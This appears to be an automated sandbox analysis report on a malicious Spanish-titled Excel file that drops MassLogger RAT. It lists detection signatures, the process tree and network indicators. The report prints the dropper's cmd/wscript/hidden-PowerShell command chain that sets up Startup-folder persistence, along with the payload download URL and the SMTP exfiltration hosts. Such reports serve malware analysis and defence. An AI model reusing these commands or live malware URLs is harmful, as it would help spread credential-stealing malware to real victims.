Loading ...

Play interactive tourEdit tour

Analysis Report LIQUIDACION INTERBANCARIA 02_22_2021.xls

Overview

General Information

Sample Name:LIQUIDACION INTERBANCARIA 02_22_2021.xls
Analysis ID:356267
MD5:8cc0e4d5044939ef3d7a7d8825d8c9c9
SHA1:61ca1ae2ac0fa0fb0f075ee09f9ff83985b5b66b
SHA256:35cf92b551f09ba61770ce1c7c5dc73b3c3e291eb98948c87d430646370a103f
Tags:ESPgeoOutlookxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected MassLogger RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the startup folder
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Machine Learning detection for dropped file
May check the online IP address of the machine
Office process drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Yara detected Beds Obfuscator
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 7032 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • a.exe (PID: 6200 cmdline: C:\PROGRAMDATA\a.exe MD5: 7D9D8812398EAF9AC0D85E728BBF8637)
      • cmd.exe (PID: 6632 cmdline: cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 2860 cmdline: timeout 4 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
        • wscript.exe (PID: 4180 cmdline: 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • powershell.exe (PID: 5596 cmdline: powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • a.exe (PID: 6772 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' MD5: 7D9D8812398EAF9AC0D85E728BBF8637)
            • a.exe (PID: 5508 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe MD5: 7D9D8812398EAF9AC0D85E728BBF8637)
  • a.exe (PID: 740 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' MD5: 7D9D8812398EAF9AC0D85E728BBF8637)
    • a.exe (PID: 6072 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe MD5: 7D9D8812398EAF9AC0D85E728BBF8637)
    • a.exe (PID: 5036 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe MD5: 7D9D8812398EAF9AC0D85E728BBF8637)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.876240165.0000000007590000.00000004.00000001.sdmpJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
    0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmpQuasar_RAT_1Detects Quasar RATFlorian Roth
    • 0xfc8d:$op1: 04 1E FE 02 04 16 FE 01 60
    • 0xfb72:$op2: 00 17 03 1F 20 17 19 15 28
    • 0x1030c:$op3: 00 04 03 69 91 1B 40
    • 0x11a0b:$op3: 00 04 03 69 91 1B 40
    0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
      0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmpQuasar_RAT_1Detects Quasar RATFlorian Roth
        • 0x84d:$op1: 04 1E FE 02 04 16 FE 01 60
        • 0x732:$op2: 00 17 03 1F 20 17 19 15 28
        • 0xecc:$op3: 00 04 03 69 91 1B 40
        • 0x25cb:$op3: 00 04 03 69 91 1B 40
        Click to see the 50 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.a.exe.39bc1e0.1.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          1.2.a.exe.39bc1e0.1.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            11.2.a.exe.3a9c1e0.1.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
              11.2.a.exe.3a9c1e0.1.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                1.2.a.exe.6e20000.4.raw.unpackJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
                  Click to see the 52 entries

                  Sigma Overview

                  No Sigma rule has matched

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus detection for URL or domainShow sources
                  Source: http://pastex.proAvira URL Cloud: Label: malware
                  Multi AV Scanner detection for dropped fileShow sources
                  Source: C:\ProgramData\a.exeReversingLabs: Detection: 27%
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exeReversingLabs: Detection: 27%
                  Machine Learning detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exeJoe Sandbox ML: detected
                  Source: C:\ProgramData\a.exeJoe Sandbox ML: detected

                  Compliance:

                  barindex
                  Uses new MSVCR DllsShow sources
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                  Uses secure TLS version for HTTPS connectionsShow sources
                  Source: unknownHTTPS traffic detected: 185.162.146.6:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49741 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49748 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49755 version: TLS 1.2
                  Binary contains paths to debug symbolsShow sources
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp
                  Source: Binary string: C:\Users\Administrator\Desktop\CalcFis\obj\Debug\CalcFis.pdb source: a.exe, mensajeria_system[1].exe.0.dr
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

                  Software Vulnerabilities:

                  barindex
                  Document exploit detected (creates forbidden files)Show sources
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\PROGRAMDATA\a.exeJump to behavior
                  Document exploit detected (drops PE files)Show sources
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: mensajeria_system[1].exe.0.drJump to dropped file
                  Document exploit detected (UrlDownloadToFile)Show sources
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
                  Document exploit detected (process start blacklist hit)Show sources
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\ProgramData\a.exe
                  Source: global trafficDNS query: name: www.seyranikenger.com.tr
                  Source: global trafficTCP traffic: 192.168.2.4:49731 -> 185.162.146.6:443
                  Source: global trafficTCP traffic: 192.168.2.4:49731 -> 185.162.146.6:443

                  Networking:

                  barindex
                  May check the online IP address of the machineShow sources
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: global trafficTCP traffic: 192.168.2.4:49761 -> 208.91.199.223:587
                  Source: global trafficHTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 54.225.220.115 54.225.220.115
                  Source: Joe Sandbox ViewIP Address: 54.225.220.115 54.225.220.115
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global trafficTCP traffic: 192.168.2.4:49761 -> 208.91.199.223:587
                  Source: global trafficHTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
                  Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmpString found in binary or memory: fUsage: https://www.youtube.com/watch?v=Qxk6cu21JSg equals www.youtube.com (Youtube)
                  Source: unknownDNS traffic detected: queries for: www.seyranikenger.com.tr
                  Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmpString found in binary or memory: http://api.ipify
                  Source: a.exe, 0000000D.00000002.953282286.0000000002F0B000.00000004.00000001.sdmpString found in binary or memory: http://api.ipify.org
                  Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmpString found in binary or memory: http://api.ipify.org/
                  Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmpString found in binary or memory: http://api.ipify.org4
                  Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmpString found in binary or memory: http://api.ipify.orgD
                  Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmpString found in binary or memory: http://api.ipify8
                  Source: a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/
                  Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
                  Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
                  Source: powershell.exe, 0000000A.00000002.810606306.0000000000D7C000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                  Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
                  Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
                  Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.cg
                  Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                  Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
                  Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
                  Source: a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                  Source: a.exe, 0000000D.00000002.953282286.0000000002F0B000.00000004.00000001.sdmpString found in binary or memory: http://elb097307-934924932.us-east-1.elb.amazonaws.com
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                  Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0K
                  Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0M
                  Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                  Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                  Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicm
                  Source: a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0A
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                  Source: a.exe, 00000001.00000002.709602421.00000000027A1000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771982708.0000000002881000.00000004.00000001.sdmp, a.exe, 00000011.00000002.841378696.00000000029A1000.00000004.00000001.sdmpString found in binary or memory: http://pastex.pro
                  Source: a.exe, a.exe, 00000014.00000000.833793134.0000000000B22000.00000002.00020000.sdmp, mensajeria_system[1].exe.0.drString found in binary or memory: http://pastex.pro/b/AEmdBGcmp
                  Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngP
                  Source: a.exe, 00000001.00000002.709602421.00000000027A1000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.818610560.0000000004C71000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771982708.0000000002881000.00000004.00000001.sdmp, a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000011.00000002.841378696.00000000029A1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: a.exe, 0000000D.00000002.953732965.0000000003073000.00000004.00000001.sdmpString found in binary or memory: http://smtp.saleforceconsults.com
                  Source: a.exe, 0000000D.00000002.953732965.0000000003073000.00000004.00000001.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlP
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://api.aadrm.com/
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://api.cortana.ai
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://api.diagnostics.office.com
                  Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
